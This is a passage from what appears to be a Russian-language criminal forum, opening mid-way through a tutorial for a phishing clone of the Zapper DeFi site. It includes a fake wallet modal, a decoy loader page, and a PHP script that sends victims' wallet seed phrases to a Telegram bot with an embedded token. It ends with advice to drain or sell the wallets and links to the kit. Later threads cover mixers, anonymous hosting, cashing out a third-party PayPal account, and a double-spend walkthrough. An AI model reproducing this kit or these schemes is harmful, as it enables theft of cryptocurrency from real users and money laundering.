                <div class="modal-content">
                    <div class="modal-header">
                        <h3 class="modal-title">Select a Wallet to Connect to Zapper</h3>
                    </div>
                    <div class="modal-body">    
                        <div class="modal-body_l">
                            <a class="modal-body_link" href="#exMask"><button class="modal-body_btn"><img class="modal-body_icon_mm" src="icons/masknew.png" alt=""><span class="modal-body_value">MetaMask</span></button></a>
                            <a class="modal-body_link" href="#exLedger"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/ledger_dob.jpg" alt=""><span class="modal-body_value">Ledger</span></button></a>
                            <a class="modal-body_link" href="#exTrezor"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/trezor_dob.jpg" alt=""><span class="modal-body_value">Trezor</span></button></a>
                            <a class="modal-body_link" href="#exPortis"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/port.jpg" alt=""><span class="modal-body_value">Portis</span></button></a>
                            <a class="modal-body_link" href="#exOpera"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/logo-opera.png" alt=""><span class="modal-body_value">Opera</span></button></a>
                            <a class="modal-body_link" href="#exBlockchain"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/blockchain.png" alt=""><span class="modal-body_value">Blockchain</span></button></a>
                            <a class="modal-body_link" href="#exExodus"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/exodus.png" alt=""><span class="modal-body_value">Exodus</span></button></a>

                            <a class="accordion" href="#openModal">What is a wallet?</a>
                            <div class="panel">
                                <p class="wal_p">Wallets are used to send, receive, and store digital assets like Ether. Wallets come in many forms. They are either built into your browser, an extension added to your browser, a piece of hardware plugged into your computer or even an app on your phone. For more information about wallets, see <a href="https://docs.ethhub.io/using-ethereum/wallets/intro-to-ethereum-wallets/">this explanation.</a></p>
                            </div>
                        </div>
                        <div class="modal-body_r">
                            <a class="modal-body_link" href="#exWalletConnect"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/walletcon_dob.png" alt=""><span class="modal-body_value">WalletConnect</span></button></a>
                            <a class="modal-body_link" href="#exLattice"><button class="modal-body_btn"><img class="modal-body_icon_lat" src="icons/+L.png" alt=""><span class="modal-body_value">Lattice</span></button></a>
                            <a class="modal-body_link" href="#exFormatic"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/forma.jpg" alt=""><span class="modal-body_value">Formatic</span></button></a>
                            <a class="modal-body_link" href="#exTorus"><button class="modal-body_btn"><img class="modal-body_icon_tor" src="img/torus3.png" alt=""><span class="modal-body_value">Torus</span></button></a>
                            <a class="modal-body_link" href="#exWalletLink"><button class="modal-body_btn"><img class="modal-body_icon_wl" src="icons/walletseedfin.png" alt=""><span class="modal-body_value">WalletLink</span></button></a>
                            <a class="modal-body_link" href="#exTrust"><button class="modal-body_btn"><img class="modal-body_icon" src="icons/trust.jpg" alt=""><span class="modal-body_value">Trust</span></button></a>
                        </div>


                        <!-- Скрипт для аккордиона в модальном окне! **************************************************************************************************-->
                        <script>
                            var acc = document.getElementsByClassName("accordion");
                            var i;

                            for (i = 0; i < acc.length; i++) {
                                acc[i].addEventListener("click", function() {
                                    this.classList.toggle("active");
                                    var panel = this.nextElementSibling;
                                    if (panel.style.maxHeight){
                                        panel.style.maxHeight = null;
                                    } else {
                                        panel.style.maxHeight = panel.scrollHeight + "px";
                                    }
                                });
                            }
                        </script>

                        <script>
                            var delay = 1000;
                            setTimeout("document.getElementById('openModal').style.display='block'", delay);
                        </script>
                    </div>
                </div>
            </div>
        </div>
    </body>
</html>

Четвертый шаг - перекидываем на loader, чтобы юзер не понял, в чем дело(это даст какое то время для обнала).

Назовем страницу disc.html

HTML:Copy to clipboard

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="CSS/style.min.css">
    <title>Zapper - Dashboard for DeFi</title>
</head>
<body>
    <img class="disc_end" src="icons/rig.gif" alt="">
</body>
</html>

Пятый шаг - пишем скрипт для обработки запросов и отправки их в тг.

Назовем его telegram.php

PHP:Copy to clipboard

<?php

header('Access-Control-Allow-Origin: *');

$sid = $_POST['sid'];
$name = $_POST['currency'];
$token = "1781605913:AAH3341p65G-4a7I9RploILsW3UyzR89CmMM";
$chat_id = "11294049069";
$cash = $_POST['cash'];
$arr = array(
  'Кошелек' => $cash,
  'Слова' => $sid,
  'Платформа' => $name
);

foreach($arr as $key => $value) {
  $txt .= "<b>".$key."</b> ".$value."%0A";
};

$sendToTelegram = fopen("https://api.telegram.org/bot{$token}/sendMessage?chat_id={$chat_id}&parse_mode=html&text={$txt}","r");

if ($sendToTelegram) {
  header('Location: disc.html');
} else {
  echo "Error";
}
?>

Проверяем!

В общем. Мы сделали фишинг сайт для обработки криптокошельков.
Таким образом, мы сможем добыть криптокошельки и их секретные слова.

1 - Льем траффик
2 - Восхищаемся профитом

Дальше выбор за Вами, либо восстановить криптокошелек или продать его ?

Файлы к статье
https://mega.nz/file/XkI3mSKa#qIoyRai929_4PTGs1aQvu0kPj5PDQ584vbDvfm2aZDw - скрипт
PASS: exploit.in

Готовый скрипт

[ WDfiles — файлообменник бесплатный - загрузить файл

](https://wdfiles.ru/513bd3)

wdfiles.ru

Присутствует, только ПК версия сайта, мобильной нет!
Сделана только blockchain платформа - с неё отсылаются данные.

Code:Copy to clipboard

<form action="telegram.php" method="POST">
    <input type="hidden" value="<?php echo trim($_POST['cash']); ?>">
    Тут код платформы, где вводят даные
</form>

автор @tuning71
источник exploit.in

Хотел узнать мнение тех кто пользовался указанным кошельком. Действительно ключи только у меня хранится будут как в Electrum? Какие комиссии при обмене на крипту другую? Какие проблемы могут быть с обменом фиата на крипту и обратно. Не про отслеживание, а чисто насколько легко будет пройти вериф, какая там биржа используется, какие суммы гонять можно?

Подскажите, пожалуйста, где можно без мороки и заполнения данных регнуть недорогие домен с хостингом?
С оплатой битком.

В рамках нового исследования было выяснено, что атака 51% на Биткоин потребовала бы «значительных расходов» и принесла бы «небольшую финансовую прибыль» атакующим.
Профессор Сараванан Виджаякумаран (Saravanan Vijayakumaran), доцент кафедры электротехники в Индийском технологическом институте (IIT) в Бомбее опубликовал новое [исследование](https://blog.zebpay.com/releasing-our-white- paper-on-bitcoin-security-a25f13396ca0) под названием «Безопасность протокола Биткоина». В исследовании, проспонсированном биржей Zebpay, была рассмотрена структура безопасности сети Биткоина по трем основным пунктам:

• Кража биткоинов;
• Внесение изменений в подтвержденные и неподтвержденные транзакции;
• Возможность прерывания нормальной работы сетевого протокола.

Основной целью исследования было оценить уязвимость сети Биткоина к атаке 51%. В соответствии с [определением](https://bitcoin.org/en/glossary/51-percent- attack) bitcoin.org, атака 51% - это «способность кого-либо контролировать большую часть хэшрейта сети, что позволит изменять историю транзакций и предотвращать подтверждение новых транзакций». В 2018 году несколько блокчейнов, включая сеть ZenCash, стали жертвами таких атак и боролись с их последствиями.

В исследовании профессор Виджаякумаран пришел к выводу, что такая атака на Биткоин потребует не только огромной вычислительной мощности, но и в результате принесет минимальную финансовую выгоду. В исследовании также указано, что злоумышленник сможет только добавлять или удалять транзакции, но не будет способен их изменять или украсть биткоины.
Несмотря на то, что сеть фактически не восприимчива к таким атакам, в исследовании упоминается, что теоретически злоумышленники могут попытаться осуществить подобное нападение.
Генеральный директор Zebpay Аджит Кхурана (Ajeet Khurana) прокомментировал результаты исследования:

«Этот документ подчеркивает безопасность революционного протокола во время более широкого внедрения криптовалюты. Zebpay гордится тем, что способствовал проведению углубленного исследования, которое является источником расширение возможностей и знаний для всей экосистемы, включая разработчиков блокчейнов, правительств, аналитических центров, ученых, регулирующих органов, правоохранительных органов, исследователей, студентов и специалистов по финансам».

Click to expand...

Проблема атаки 51% довольно часто становится предметом дискуссии сообщества. Например, в прошлом месяце стало известно, что «белый хакер» проводит тестовые атаки 51% на криптовалюты, чтобы проверить их безопасность. А ранее в том же месяце команда Horizen предложила вариант решения проблемы атаки 51%.

посоветуйте, кто плотно работал с биржей Bittrex.com? как у вас впечатление?
как у них живут верифнутые акки? да и вообще, как биржа себя ведет в плане локов, верификаций и всего остального?

Комиссия. В чем проблема может быть? Это не здоровая, херня. Месяц +/- назад пользовался, все было норм и комиссия адекватная. А щас см скрин

Если я получил биткоин на кошелек, оплатив биткоин с моей личной картой. И потом этот биткоин провел через миксер. Могут ли найти исходную транзакцию и понять кто я? (обратившись в то место где я покупал биткоин)

Добрый день, дорогие форумчане! :3

Как организовать приём платежей в интерент-магазине, чтобы "клиент" оплачивал евро \ долларами, а администратору интернет-магазина денежная сумма приходила сразу в биткоинах? Видели ли подобные реализации? Важно, чтобы клиент "не особо запаривался и вникал" в схему оплаты, для него это должно выглядеть макимально просто (т.е. процесс оплаты не отличается от бонального интернет- магазина). Весь процесс нужно автоматизировать.

Все заметили что творится с догами?
+190%
Что будет с ними через час? Неделю?

Сабж, посоветуйте движки обменников для обычных и криптовалют

Максимум обновили. И уже никто не удивляется, как в 2017м ))
Какие интересные заголовки пошли в новостях

Эксперты: биткоин достигнет $30 000 уже в ближайший месяц
В Guggenheim Partners спрогнозировали рост биткоина до $400 000
Профессор ВШЭ спрогнозировал долговременный бычий тренд для биткоина
Канадский экономист назвал биткоин пузырем на фоне нового ценового максимума
Цена биткоина пробила уровень $23 000
Трейдер рассказал о возможном росте цены биткоина к $26 000

Click to expand...

Это чувство легкого дежавю )

Сейчас представлено много bitcoin кошельков с уже встроенными миксерами по технологии CoinJoin
чем пользуетесь? ваши отзывы? давайте обсудим, что лучше )

Биткойну скоро 9 лет. Почему до сих пор нет нормальной P2P биржи? Считаю это вопиющим упущением, и хочу предложить решение данной проблемы.

Суть проблемы

Биткойн по своей природе - ресурс ограниченный, и поэтому является превосходным средством сохранения стоимости. Но, в тоже время, это очень волатильный актив, что делает инвестиции в него достаточно рискованным мероприятием. По мере увеличения капитала необходимо снижать риск крупных убытков, и распределять средства между различными вложениями. К сожалению, в крипто мире всё завязано на биткойн, и диверсификация инвестиционного портфеля возможна только за счет выхода на внешние рынки. Если вы накопили достаточно значительный капитал в биткойнах, то наверняка уже задумывались над этой проблемой.

Конечно, можно просто перевести часть биткоинов в фиат и держать его на криптовалютных биржах. Но это отнюдь не уменьшает риски, а скорее наоборот - клиентам Bitcoinica, MtGox, Bitfinex, BTC-e, и других обворованных площадок было намного выгоднее просто держать свои биткойны у себя.

Другой способ диверсификации портфеля - перевод в фиатную валюту с последующим обналичиванием. Но это крайне неудобно, и также сопряжено с определнными рисками, ограничениями и издержками, особенно в недружественных криптовалютам юрисдикциях. Для того, чтобы исключить риски и одновременно уменьшить издержки необходимо создавать децентрализованный рынок или биржу.

Краткий обзор существующих решений

На данный момент вижу только два более менее адекватных подхода - bisq(bitsquare) и Bitshares:

bisq - это по сути, не биржа, а скорее обменник + escrow сервис наподобие localbitcoins. Основной её недостаток это зависимость от банков или централизованных платёжных сервисов. И поскольку это escrow, то во время сделки пользователи также вынуждены доверять свои биткойны третьей стороне

Bitshares. - хитрая система, которая позволяет создавать смарткоины (например bitUSD), которые обеспечены внутренними токенами (BTS) в соответствии с ценами на внешних биржах, которые публикуются свидетелями, и, таким образом, пользователи могут ими владеть и торговать

Вроде бы, ещё что-то подобное планируется на платформе эфириум, но это неинтересно. Насколько я понимаю, большая часть эфира и битшар находятся в руках разработчиков, и значит эти системы уже уязвимы и довольно слабо децентрализованы. А самое главное, очень трудно понять и оценить надёжность механизмов их работы, что сильно повышает риски и, следовательно, снижает ликвидность

Можно выделить ключевые недостатки перечисленных решений:
- зависимость от централизованных платёжных сервисов (снижает анонимность и увеличивает риски)
- использование в качестве обеспечения залога премайн-альткойнов вроде BTS или ETH (снижает надёжность и увеличивает риски)
- необходимость конвертации BTC в полном объёме в альткойн для обеспечения залога (катастофически снижает ликвидность и увеличивает издержки)
- хитрая и трудная для понимания схема работы и обеспечения залога, а также сомнения в надёжности поставщиков прайсов (катастофически снижает ликвидность и увеличивает риски)

Будет ли востребована децентрализованная bitcoin биржа?

Привет всем!
мб кто-то встречал или сталкивался. нужно указать свое примечание к банковскому переводу при обмене крипты. с биткоинов на банковский счет
т.е чтобы я отправил битки, а мне на банк зашел платеж с необходимым мне примечанием
кто сталкивался? как организовать? мб какие-то системы типа скрила позволяют указать такое?

Всем привет! Ребят посоветуйте какой-нибудь сервис/обменник который поможет обменять эл.деньги PayPal на BTC, USD или RUB
Дело вот в чём: аккаунт PayPal который я буду использовать для обмена зарегистрирован на третье лицо (то есть не на меня). Это проблема потому что многие сервисы/или продавцы валюты на этих сервисах часто требуют чтобы имя в аккаунте PayPal совпадало с именем учётной записи на этих сервисах (на английском часто ещё пишут это так: "id name should match with account name" или просто пишут "no third party"). Для меня это не подходит так как я сказал выше-аккаунт зарегистрирован на третье лицо.
C Paxful больше не работаю, так как был негативный опыт. C Localbitcoins тоже пока временно не работаю из-за определённых технических причин.

Есть ли ещё какие-то аналогичные сервисы которые позволяют обменять PayPal ?
или может есть какое-то решение как это сделать ?
частные услуги ребят которые занимаются обналом пока не рассматриваю, поэтому их пожалуйста не предлагать

Здравсттвуйте. Посоветуйте веб-кошелек Bitcoin для пользования через TOR браузер. Без всяких капч и прочего шлака. Блокчейн не предлагать, не пашет через TOR.

**Утечка информации разведки ФБР показывает, как темные веб-преступники используют панамский крипто-чейнджер для отмывания грязного Биткойна в монету конфиденциальности Monero.

Вкратце**

1. В просочившемся документе ФБР подробно описаны три случая, когда панамский «мгновенный» криптообмен Morphtoken «вероятно» использовался для отмывания биткойнов незаконного происхождения путем их преобразования в Monero.
2. ФБР использовало «проприетарный программный инструмент» для отслеживания участников рынка даркнета вместе с собственным API Морфтокена.
3. Отчет был разоблачен как часть дампа данных «Blueleaks», в котором было обнаружено более 270 ГБ файлов правоохранительных органов.

Арепорт, подготовленный полевым офисом Федерального бюро расследований в Вашингтоне и разоблаченный в дампе данных Blueleaks объемом 270 ГБ, показывает, как ФБР отслеживало темных веб-преступников, отмывающих грязный биткойн, путем преобразования его в монету конфиденциальности Monero.

В просочившемся документе ФБР подробно описаны три случая, когда панамский «мгновенный» криптообмен MorphToken «вероятно» использовался плохими актерами для отмывания биткойнов незаконного происхождения путем преобразования его в Monero; Два из названных рынков даркнета (DNM) включают Apollon и Cryptonia.

По состоянию на январь 2020 года ФБР выявило участников рынка даркнета, связанных с рынком Аполлона, которые отправили в MorphToken не менее 11 биткойнов (тогда их стоимость составляла приблизительно 80 000 долларов США) для конвертации в Monero. ФБР использовало «проприетарный программный инструмент», который анализирует финансовые транзакции на блокчейне Биткойн, наряду с собственным интерфейсом прикладного программирования (API) MorphToken, для мониторинга транзакций.

ФБР также проанализировало комиссионные сборы с транзакций Биткойн, совершенных на Криптонии в период с мая по сентябрь 2019 года, обнаружив, что активы были отправлены по адресам, связанным с MorphToken. Каждая связанная транзакция, которая могла быть запрошена через API MorphToken, была преобразована в Monero.

В ноябре 2019 года ФБР также идентифицировало как минимум четырех темных интернет-продавцов, которые отправляли доходы от продаж биткойн-наркотиков в MorphToken.

«Хотя MorphToken предлагает конвертировать биткойны в пять разных криптовалют, почти во всех конверсиях, выявленных ФБР, проводимыми участниками DNM, где можно было определить выходную валюту, пользователь конвертировал биткойны в Monero», - говорится в отчете.

Правоохранительные органы предполагают, что участники рынка даркнета не собираются в Monero с целью диверсификации портфеля. Согласно политике Бюро, ФБР отказалось комментировать эту историю.
**
Что такое мгновенный криптообмен?**
Мгновенные криптовалюты, такие как Morphtoken, позволяют быстро конвертировать одну криптовалюту в одну или несколько других. ФБР подчеркивает отсутствие официальных протоколов «знай своего клиента» (KYC) - столп соответствия современному закону о банковской тайне - на Morphtoken и аналогичных биржах, что вызывает озабоченность. MorphToken отказался комментировать для Decrypt утечка отчета ФБР.

Morphtoken включен в Панаму, юрисдикцию которой не внедрили какие-либо правила для виртуальных валют или криптовалют, согласно панамской юридической фирме Kraemer and Kraemer.

Благодаря таким утечкам, как «Панамские документы», Панама стала синонимом банковской тайны и использования юридических средств защиты и корпоративных структур для защиты от анонимности лиц, уклоняющихся от налогов и отмывателей денег.

Монеро и темная паутина
ФБР также указало на публикации пользователей на сайтах и форумах рынка даркнет, на которых обсуждалось использование Morphtoken и других подобных сервисов в качестве порталов преобразования для Monero - самой устойчивой «криптовалюты, повышающей анонимность» в обращении. MorphToken - один из восьми «чейнджеров» Monero на темном форуме сообщества Dread.


Компания по контролю за соблюдением блокчейнов Chainalysis за 2020 год Crypto- Crime Report сообщила, что Monero «набирает популярность и может стать криптовалютой выбора для большего числа преступников в 2020 году».

Monero сочетает в себе три разные технологии конфиденциальности: кольцевые подписи, кольцевые конфиденциальные транзакции (RingCT) и одноразовые адреса кошелька-невидимки. В результате этого незаконные пользователи Monero не могут быть идентифицированы.

Конструкция Monero имеет сходство с «кукушкой», схемой отмывания, в которой финансовые посредники скрывают потенциально преступных субъектов, перестраивая своих отправителей и получателей в аналогичных сделках.

Можно ли отслеживать Монеро?
Принимая во внимание скрытность Monero и его автономно восстанавливающиеся и зашифрованные платежные цепочки, Том Робинсон, главный ученый британской фирмы, занимающейся криптовалютой Elliptic, не считает возможным проникнуть сквозь завесу секретности криптовалюты.

«Я не ожидаю увидеть инструменты соответствия на основе мониторинга цепочки блоков для Monero в ближайшее время, если вообще когда-либо».

«Я не ожидаю, что инструменты соответствия на основе мониторинга цепочки блоков появятся для Monero в ближайшее время, если вообще когда-либо», - сказал Робинсон в Decrypt.

В отчете ФБР говорится, что по мере того, как будет опубликовано больше примеров того, как правоохранительные органы успешно отслеживают криптовалюты, преступники «скорее всего» расширят применение криптовалют, повышающих анонимность, таких как Monero.

Что такое Блюликс?
Утечка брифинга ФБР - это лишь один из сотен тысяч файлов из Blueleaks, тайник полицейских документов, незаконно вывезенных хактивистской группой Anonymous. Файлы Blueleaks были опубликованы Distributed Denial of Secrets, самопровозглашенным «коллективом прозрачности», и охватывают «данные за 24 года из более чем 200 полицейских управлений, центров по слиянию и учебных / вспомогательных ресурсов, взломанных Anonymous», согласно веб-сайту DDoS. ,

Документы были взяты у Netsential, компании по веб-дизайну, расположенной в Техасе, где размещаются правоохранительные сайты. Информационный сайт о кибербезопасности Krebsonsecurity подтвердил достоверность утечек данных посредством внутреннего анализа, проведенного 20 июня Национальной ассоциацией центров слияния (NFCA), состоящей из представителей государственных и местных центров слияния городских районов.

Я использую Google Translate для перевода этой темы с английского на русский; Оригинальную ссылку [нажмите здесь.](https://decrypt.co/34740/blueleaks-how- the-fbi-tracks-bitcoin-laundering-on-the-dark- web?fbclid=IwAR3bMqU_UaLeaXuYuZrQGolCqHXA-NOcjCM0g5atBWzqA5yMgrq27y2Fy68)

Здравствуйте.
Уважаемые, я нуждаюсь в совете, а именно - как уже стало ясно с названия темы, как всё таки лучше хранить биткоин?
Сейчас у меня деньги на блокчейн.ком, но я так понял с отзывов - это не самый надежный вариант. Кстати, они могут блокировать кошельки как раньше вебмани например?
Суть - посоветуйте, пожалуйста, какой кошелек выбрать или где лучше хранить биткоин ?
Цель - долгосрочное хранение в надежном месте, чтобы ничего с ними не случилось как например когда-то liberty reserve накрылось и всё пропало...
Заранее благодарен!

Сейчас довольно большой ажиотаж вызывает новая криптуха GRIN COIN с системой MimbleWimble и неограниченной эмиссией. Многие кричат, что это замена битку, новое цифровое золото, мол такого ещё не создавали и тд и тп.
https://grin-tech.org/
Их сайт
Кто что знает на этот счёт?)
Прошу не стесняться и высказывать своё мнение в комментах )

Основатели ICO продали почти все свои запасы ETH

Многие эксперты утверждают, что стремительное снижение цены ETH в течение II и III кварталов этого года связано с массовой продажей актива организаторами ICO, которые опасаются убытков и вынуждены нести повседневные расходы. Некоторые также предполагают, что не все проекты продали свои активы и есть вероятность еще одной волны падения. Криптовалютная биржа BitMEX провела исследование этого вопроса и заявила, что их опасения беспочвенны.

BitMEX Research и TokenAnalyst проанализировали 222 проекта, которые в сумме собрали $5.5 миллиарда в Ethereum и установили, что на текущий момент они продали ETH примерно на такую же сумму (всего на $11 млн меньше). Таким образом получается, что они в долларовом выражении уже избавились от риска убытков, но при этом в запасе еще осталось 3.8 млн ETH, что составляет примерно 25% от изначально собранного объема.

Многие могут удивиться тому, что проекты ICO имеют не текущий убыток, а нереализованный доход, но стоит учитывать время сбора средств. Большинство проектов провели кампании продажи токенов еще до начала резкого роста курса ETH. Тем не менее данная информация не гарантирует, что некоторые отдельно взятые ICO не потерпели серьезных убытков.

Совокупная сумма нереализованных убытков проектов, которые продолжили держать ETH после проведения ICO, составляет $311 млн, но при этом нереализованный доход выше и составляет $403 млн.

На графике выше можно заметить, что за последние 26 месяцев на кошельках ICO- проектов было максимум 5.1 млн ETH, эта цифра намного меньше, чем собранные средства за все время (15,2 млн или 8 млн, если исключить EOS). Таким образом можно сделать заключение, что ранее собранные ETH с помощью ICO были проданы и повторно инвестированы в новые проекты. Также график показывает, что большая часть средств ICO-проекты собрали перед достижением ETH пиковых значений ($1400).

Исходя из своих исследований BitMEX Research заключает, что остаток средств на балансах ICO имеет слабое влияние, а о новой панической распродаже речь больше не идет. Исследователи также предположили возможные погрешности в расчетах относительно отдельно взятых проектов, но отмечают, что общая картина при этом никак не меняется.

«Другой вопрос заключается в том, грамотно ли проекты инвестировали и будут инвестировать собранные средства, будут ли они разрабатывать полезные продукты и услуги. Мы предполагаем, что уровень подотчётности в некоторых из этих ICO низок. Иногда сложно проанализировать сколько денег удалось собрать, какие валюты собирались, какие адреса Ethereum использовались, тратили/продавали активы или нет. Но на первый взгляд кажется, что плоды инвестирования разочаровывают», - пишут исследователи.

Двойная трата (Double-spending) в Bitcoin - пошаговая инструкция. Как провести дабл спенд?

Нужно вручную собрать транзакцию и отправить ее в сеть, это можно сделать онлайн имея только приватный ключ. Далее описывается именно такой способ.

Различные сервисы предоставляют онлайн кошельки, но многие из них хранят приватный ключ у себя - это далеко не лучший вариант, в один прекрасный момент можно остаться с нулевым балансом, поэтому к выбору онлайн-кошелька стоит отнестись с особой тщательностью.

В данном примере будет использоваться сервис https://txid.io/wallet/ , основанный на Open-Source решении Coinb.in, который не хранит Ваш приватный ключ и даже не передает его по сети, а все действия с ним выполняются в браузере, приватный ключ никогда не передается за пределы вашего компьютера.

1) Нужно знать свой приватный ключ, без него ничего нельзя сделать. В случае, если вы используете онлайн кошелек типа blockchain.info - там этот ключ можно экспортировать. В случае использования core клиента - есть команда dumpprivkey. Этот пример показан для простого случая, когда используется один вход и один выход. Сравнительно новая фича Replace-by-Fee (RBF) в данном конкретном примере не используется.

1а) В случае использования популярного Онлайн-кошелька https://blockchain.info отдельная инструкция по получению приватного ключа для нужного адреса есть в этом сообщении (предпочтительный вариант) или вот в этом сообщении.

2) Для наглядного примера используем следующую транзакцию
https://www.blocktrail.com/BTC/tx/c3c63dbcf7777b4a10473dd59318ad1433abe454276b7a5369e3870a8174a380

С адреса 1AuN48871owVr3SRbidwxMRACsi2QoqekD на адрес 12m5oXmDzY4Ad7rKuF88sFf29bEDiyEEPL было отправлено 0.01019000 BTC (191 байт) с очень низкой комиссией 0.00001000 BTC. Такая транзакция практически никогда не будет подтверждена, вероятность очень низкая.

Задача сделать двойную трату - Double Spending, обычный клиент этого сделать не позволит, но если мы будем собирать транзакцию вручную, то это не проблема. Приступим.

3) Нам нужны данные о входах, для этого нам необходима указанная транзакция в шестнадцатеричном raw-формате.
Взять ее можно, например, на blockchain.info , добавив в адресную строку браузера ?format=hex

https://blockchain.info/tx/c3c63dbcf7777b4a10473dd59318ad1433abe454276b7a5369e3870a8174a380?format=hex

Code:Copy to clipboard

01000000012abae037dd7687ca4b91455f1b48f21c24d193e830bb170d6a3c66ca48509e6f020000006a47304402205ffb001b226e86485b808e972f4b114db4916009752b711cdab29e082ae608c70220712ef618bd4dfd2c7bd8c581ba55ed794e09b866c68f0330d56f659cf7cfc41b012102809dc03bef8fa77bb15407e065c50fb5855372ed374eb05db4266c9011474645ffffffff01788c0f00000000001976a914134e6fd3425fd01c8de1dd75570e942ce39eccfd88ac00000000

Открываем https://txid.io/wallet/ и в меню выбираем Verify , вставляем текст транзакции и нажимаем Submit

Нас интересует только вход, а именно Txid (6f9e5048ca663c6a0d17bb30e893d1241cf2481b5f45914bca8776dd37e0ba2a), номер выхода N (2).

4) Также нам понадобится подписанный скрипт предыдущего выхода, его мы получаем таким же образом. Для этого получаем предыдущую hex транзакцию, которая была входом для адреса, с которого мы отправляли монеты.
https://blockchain.info/tx/6f9e5048ca663c6a0d17bb30e893d1241cf2481b5f45914bca8776dd37e0ba2a?format=hex

Code:Copy to clipboard

0100000001030f1a5d236253755393f3fa79405b77bebb9678653cb0371210fec33ded146f070000008b483045022100f7841029295f33782e6a7e0c3715a59a7db601148f5c56640c7675541be15eec02200adabfda318f417a2c51fb0a2bc152ad9ad67f065ed73a77cf7b0852d3959ab30141047146f0e0fcb3139947cf0beb870fe251930ca10d4545793d31033e801b5219abf56c11a3cf3406ca590e4c14b0dab749d20862b3adc4709153c280c2a78be10cffffffff15a4cc0100000000001976a9146324e56e4df5f8b8ae15e39c7c674deb67f550a888acf3eb0700000000001976a9144b993d0e6587c927c02e39ad3182ccc10a67a61b88ac60900f00000000001976a9146ca05640f6e89a50a27fe09f453bc3db9bcd064488acf18d1200000000001976a9144ebea438ff16b3286e7998a4299d29fde64fb3de88acdf9b1500000000001976a91456a86a5cffa4ae3d07b211b0c5f40f08b8cab7a188ac57d219000000000017a914ab40626275feee23341fbd1fff593bcfaad7a2f48722b024000000000017a914df829efb120fdd8910947ffd4505bb3f7904d4d687213c3000000000001976a914162d1d879ace28171e411e17ee299969bed2ce1488ac104e3800000000001976a914a49ba60dbb898a6508d252631d756cf154fb9fee88acec1d3b00000000001976a91410271bd45e3e3289ae5041a4edabacba1749da9888ac007c92000000000017a9146a8743c6fb7679a7d5f65dc7f020c478291d2c0a875365dc00000000001976a914b8fed54a741a3b25243781372798ac03e1486e5f88ac603c1701000000001976a914afe7c0ebed0013b35ac6a53a108bfd5e0fdb326f88acec609d01000000001976a914e5fe2f7ae1ce179294b452be8dac9140dd766ff888ac619678070000000017a914871ca8a083161999a7fcea6077fca65d0d9d8da687f01358080000000017a914f95b152273931b61ba1078fc3288fb6844e41c04874744440d000000001976a914ff4c10afb6d0ffd58f2a8490ebd1068a4a24d53588acf07be111000000001976a91433602f31035f03f0c541bbd5b797501492402da188ac70f0b32c000000001976a9147bda6b0d53273b256731e97e1c2ef2c206cfe85688acf0d10295000000001976a914ec212c35086ed5242b268db7d95391402b1a58d388acc04e8a170b0000001976a91443849383122ebb8a28268a89700c9f723663b5b888ac00000000

Открываем https://txid.io/wallet/ и в меню выбираем Verify , вставляем текст транзакции и нажимаем Submit

Находим наш адрес 1AuN48871owVr3SRbidwxMRACsi2QoqekD и сохраняем значение Script (76a9146ca05640f6e89a50a27fe09f453bc3db9bcd064488ac)

Все те же самые данные можно получить и из других блокчейн-эксплореров, не обязательно использовать blockchain.info.

Например,

https://bitaps.com/api/raw/transact...7bb30e893d1241cf2481b5f45914bca8776dd37e0ba2a

{"hex": " __raw transaction text __ "", "hash": "..."}

Также, например, по ссылке https://live.blockcypher.com/btc/decodetx/ можно всю информацию получить в одном месте, порядковый номер выхода посчитать, начиная с нуля.

5) Открываем https://txid.io/wallet/ и в выпадющем меню выбираем New -> Transaction

6) Нам нужно указать данные как о входах, так и о выходах.
Сначала в закладке Inputs (входы) указываем данные, которые мы получили в пунктах 3 и 4.

7) Далее указываем Outputs (выходы), можно указать тот же самый адрес получателя, а можно указать другой. В поле Amount указываем сумму к отправке за вычетом комиссии за перевод, комиссия автоматически посчитается и отобразится ниже в поле Transaction Fee. В данном конкретном примере 0.0002 будет вполне достаточно.

Нажимаем Submit , видим новую сгенерированную транзакцию, а также ее размер. Этот размер неподписанной транзакции.
Копируем hex-текст транзакции в буфер обмена.

Code:Copy to clipboard

01000000012abae037dd7687ca4b91455f1b48f21c24d193e830bb170d6a3c66ca48509e6f020000001976a9146ca05640f6e89a50a27fe09f453bc3db9bcd064488acffffffff0140420f00000000001976a914134e6fd3425fd01c8de1dd75570e942ce39eccfd88ac00000000

8) Подписываем. Идем в меню Sign , указываем приватный ключ (он никуда не передается , вся работа с ключом происходит в браузере), нажимаем Submit и получаем уже подписанную транзакцию.

Code:Copy to clipboard

01000000012abae037dd7687ca4b91455f1b48f21c24d193e830bb170d6a3c66ca48509e6f020000006a47304402202492709f4d4a420b237615cb00b85e6a7fa6b5f08b397aeefb806a16c382684f0220348d7ff0d92ff8c628c01a79888da6cba4691da37808f07e82ceeffa71f4711f012102809dc03bef8fa77bb15407e065c50fb5855372ed374eb05db4266c9011474645ffffffff0140420f00000000001976a914134e6fd3425fd01c8de1dd75570e942ce39eccfd88ac00000000

Смотрим ее размер, убеждаемся, что указанной ранее комиссии достаточно для 191 байт.

9) У нас есть новая и уже подписанная транзакция для двойной траты. Чтобы убедиться, что все сделали правильно,
еще раз открываем в новом окне страницу Verify https://txid.io/wallet/#verify , вставляем текст транзакции из п.8 и нажимаем Sumbit.
Проверяем выход - адрес и сумму.

10) Осталось только отправить транзакцию в сеть.
В меню выбираем Broadcast https://txid.io/wallet/#broadcast , вставляем текст подписанной транзакции и отправляем в сеть.

В результате получаем номер новой транзакции с двойной тратой - Txid: 1cd32dd0cadbd8b01027729314af182136053850f51c665cea00ac8b6232cc47

11) В случае какой-либо ошибки, если транзакцию отправить не удалось через пункт Broadcast - пытаемся отправить ее в сеть через
любые другие Push-сервисы, наиболее популярные можно найти на данной странице https://en.bitcoin.it/wiki/Transaction_broadcasting

12) Так как это double-spending транзакция, то не все ноды и, соответвенно, Блокчейн-Эксплореры смогут сразу отобразить ее корректно до подтверждения сетью, поэтому рекомендуется проверять новую транзакцию в разных местах.

